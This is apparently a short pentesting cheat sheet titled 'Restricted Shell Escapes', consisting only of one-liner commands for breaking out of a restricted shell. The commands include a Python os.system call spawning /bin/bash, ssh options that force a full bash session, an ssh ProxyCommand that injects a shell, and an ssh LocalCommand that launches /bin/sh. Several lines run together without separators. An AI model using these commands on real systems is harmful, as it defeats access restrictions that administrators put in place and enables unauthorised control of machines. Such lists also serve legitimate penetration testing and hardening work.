Restricted Shell Escapes
Last updated
python -c 'import os; os.system("/bin/bash");'ssh ryuu@$host -t 'bash --noprofile'
ssh ryuu@$host -o ProxyCommand=';sh 0<&2 1>&2' xssh -o PermitLocalCommand=yes -o LocalCommand=/bin/sh hostecho os.system('/bin/bash')